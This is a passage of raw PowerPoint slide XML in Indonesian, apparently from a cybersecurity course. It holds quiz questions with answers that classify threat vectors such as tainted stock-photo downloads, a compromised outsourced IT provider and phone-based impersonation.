              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bekas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1115298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D" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>foto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cipta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengilustrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>presentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>internalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Selanjutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di header file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>foto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Threat vector: Supply chain attack &amp; Malicious file download (media file embedding / steganography in image)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>foto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>tainted media supply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>drive-by file download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IT outsourcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>vector: Third-party / Supply chain / Vendor compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> melalui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>outsourced IT provider, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> software, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>third-party relationship</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelalaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Threat vector: Social engineering via impersonation (vishing / phone-based phishing), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
